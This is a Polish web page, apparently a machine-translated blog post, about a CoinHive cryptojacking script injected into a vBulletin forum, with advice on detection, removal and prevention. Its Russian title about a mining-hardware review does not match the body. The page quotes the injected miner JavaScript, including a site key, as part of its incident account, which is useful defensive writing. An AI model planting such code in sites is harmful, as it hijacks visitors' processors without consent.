Crypto news: техно обзор асик майнера Antminer T17e 50 TH/s от Bitmain. Доходность и цены
Spisu treści:
Czytałem o właścicielach witryn internetowych za pomocą skryptów na ich stronach internetowych, które korzystają z procesora komputera odwiedzającego podczas odwiedzania ich strony internetowej. Chodzi o zarabianie na ich zawartości - i zamiast używać reklam, używają skryptu działającego w przeglądarce i wykorzystującego zasoby komputera użytkownika do wydobywania kryptowalut. Ale myślałem, że tylko właściciele stron robią to z założenia - nigdy nie przypuszczałem, że hakerzy zhakują strony internetowe i przeniosą skrypt na inne strony internetowe i wykorzystają procesor odwiedzający, by zarobić pieniądze dla siebie. Ale to się teraz dzieje!
Coinowy skrypt do krypto-górnictwa
Wczoraj, kiedy odwiedziłem nasze Forum TWC, które działa na oprogramowaniu vBulletin, moje oprogramowanie bezpieczeństwa zwróciło to ostrzeżenie:
// coinhive dot com /lib/coinhive.js Wykryto plik obiektu, pobierz zablokowany
Zazwyczaj odwiedzam forum codziennie i nie widziałem go dzień wcześniej. Zakładam więc, że zdarzyło się to w czasie nocy, mojego czasu, kiedy spałem.
Używam oprogramowania vBulletin na forum i zostało ono zaktualizowane do najnowszej wersji. Co więcej, było to dla nas dość zaskakujące, ponieważ domena TheWindowsClub.com używa Sucuri Web Antivirus & Firewall , aby chronić się przed atakami i atakami sieciowymi w Internecie.
Oprogramowanie zabezpieczające moje PC skutecznie powstrzymało złośliwy skrypt przed uruchomieniem na moim komputerze z systemem Windows 10. Sprawdziłem w innych przeglądarkach takich jak Chrome i Edge, a wyniki były takie same.
Po kliknięciu prawym przyciskiem myszy na stronie internetowej forum i sprawdzeniu kodu źródłowego, stwierdziłem, że był to złośliwy skrypt CryptoMiner CoinHive.
To jest złośliwy Coinhive Javascript, który dostał się do mojego kodu na forum:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
W każdym razie, pierwszą rzeczą, którą zrobiłem było wzięcie na forum i poinformuj Sucuriego.
Ludzie z Sucuri wyczyścili forum skryptu Coinhive, który został wepchnięty na moje forum w ciągu kilku godzin, a wszystko było w porządku.
Co to jest CoinHive
Coinhive oferuje górnik JavaScript dla kryptowaluty Monero, którą możesz zamieścić na swojej stronie i użyć procesora komputerów odwiedzających stronę, aby wydobywać monety.
To się nazywa Cryptojacking . Polega ona na przejęciu przeglądarek użytkowników w celu wydobycia kryptowalut. Niektórzy właściciele witryn mogą używać go do zarabiania pieniędzy - ale w naszym przypadku został on wstrzyknięty.
Kiedy użytkownik uzyskuje dostęp do zainfekowanej strony, JavaScript Coinhive wykonuje i kopie Monero wykorzystując zasoby procesora użytkownika. Może to spowodować spowolnienie procesora i niespodziewaną awarię systemu maszyny ofiary.
Teraz, jeśli Twoja przeglądarka jest zainfekowana, zobaczysz, że wykorzystanie zasobów rośnie. Zamknij przeglądarkę i spadnie. Użytkownik może zauważyć nagrzewanie się swojego urządzenia, szybkie działanie wentylatora lub szybkie rozładowanie baterii.
Poprosiłem mojego kolegę, Saurabha Mukhekara, aby odwiedził moje forum za pomocą Mac i zobaczył, co się stało. Cóż, jego komputer Mac również został dotknięty, gdy otwierał forum z Safari! Jest jednym z tych inteligentnych użytkowników Mac OSX, którzy używają oprogramowania antywirusowego na swoim Macu. Jego program antywirusowy Avast dla komputerów Mac pomyślnie zatrzymał złośliwy skrypt.
Saidabh,
CoinHive malware nie tylko przechwytuje komputer z systemem Windows, ale także Maca, ponieważ jest to infekcja JavaScript w przeglądarce. Dobrze, że nie wierzę w to, że komputery Mac nie potrzebują oprogramowania antywirusowego, inaczej moja maszyna byłaby zainfekowana, a mój Mac nadal by wyrzucał monety dla kogoś innego.
Zapobiegaj zarażeniu CoinHive przez twoją stronę
- Nie używaj żadnych szablonów lub wtyczek NULL na swojej stronie / forum
- Zachowaj swój CMS zaktualizowany do najnowszej wersji
- Regularnie aktualizuj swoje oprogramowanie hostingowe (PHP, bazy danych itp.).
- Zabezpiecz swoją witrynę za pomocą dostawców zabezpieczeń internetowych, takich jak Sucuri, Cloudflare, Wordfence itp.
- Podejmij podstawowe środki ostrożności, aby zabezpieczyć swojego bloga.
Usunięcie górnika CoinHive z witryny
Po pierwsze, musisz zostać webmasterem zainfekowana strona internetowa - lub poświadczenia administracyjne zapewniające dostęp do wszystkich plików witryny.
Teraz, gdy program antywirusowy wykryje infekcję CoinHive, kliknij prawym przyciskiem myszy na stronie internetowej i wybierz Wyświetl kod źródłowy. Następnie naciśnij Ctrl + F i wyszukaj "CoinHive".
Po zidentyfikowaniu lokalizacji złośliwego kodu, musisz zobaczyć jego pozycję - gdzie się znajduje. Teraz musisz usunąć go ręcznie. Aby to zrobić, potrzebujesz trochę wiedzy o kodowaniu swojej platformy. Będziesz musiał zlokalizować zainfekowane pliki / pliki i ręcznie usunąć z niego powyższy skrypt. Jeśli nie jesteś tego pewien, poproś o to eksperta. Ponieważ używamy Sucuriego, pozwalamy im to zrobić.
Po wykonaniu tej czynności wyczyść pamięć podręczną serwera i przeglądarki. Jeśli używasz wtyczek pamięci podręcznej lub powiedz MaxCDN, wyczyść te pamięci podręczne.
Zabezpiecz się przed skryptami do wyszukiwania kryptograficznego
Cryptocurrencies i technologia Blockchain przejmują kontrolę nad światem. Ma to wpływ na globalną gospodarkę i powoduje również zakłócenia technologiczne. Wszyscy zaczęli skupiać się na tak lukratywnym rynku - w tym również hakerzy witryn. Wraz ze wzrostem zwrotów powinniśmy oczekiwać, że takie technologie będą wykorzystywane niezgodnie z przeznaczeniem. To jest ciemna strona każdej nowej technologii.
Możemy zrobić wszystko, aby zachować jak najlepsze środki ostrożności. Poza korzystaniem z dobrego oprogramowania zabezpieczającego, użyj rozszerzenia przeglądarki Chrome lub Firefox, które blokuje witryny internetowe z wykorzystaniem twojego CPU do kopania Kryptowaluty - albo lepiej użyj Anti-WebMiner, który zatrzyma ataki Cryptojacking Mining Script, modyfikując twój plik Hosts. Działa na wszystkich przeglądarkach. Jeśli jesteś użytkownikiem komputera Mac, skorzystaj z oprogramowania antywirusowego również dla tego komputera.
Jeśli masz wrażenie, że odwiedziłeś zainfekowaną stronę, dobrym pomysłem jest wyczyszczenie przeglądarki. buforuj i skanuj urządzenie za pomocą oprogramowania antywirusowego, a także programu AdwCleaner.
Zachowaj bezpieczeństwo, bądź czujny!
Jak usunąć lub usunąć powiązanie Windows Phone z identyfikatorem Windows Live
Twoje aplikacje są już używane na maksymalnej liczbie urządzeń. Użyj oprogramowania Zune na komputerze, aby zaktualizować urządzenia.
Jak usunąć pliki w systemie Windows 10, których nie można usunąć
Niektóre pliki w systemie Windows nie mogą zostać usunięte. Jeśli masz takie problemy na komputerze z systemem Windows 10, wypróbuj te kroki.
Jak korzystać z komendy linux sleep, aby wstrzymać skrypt bash
Tryb uśpienia to narzędzie wiersza polecenia, które umożliwia zawieszenie procesu wywoływania na określony czas. W tym samouczku pokażemy, jak używać polecenia uśpienia w systemie Linux.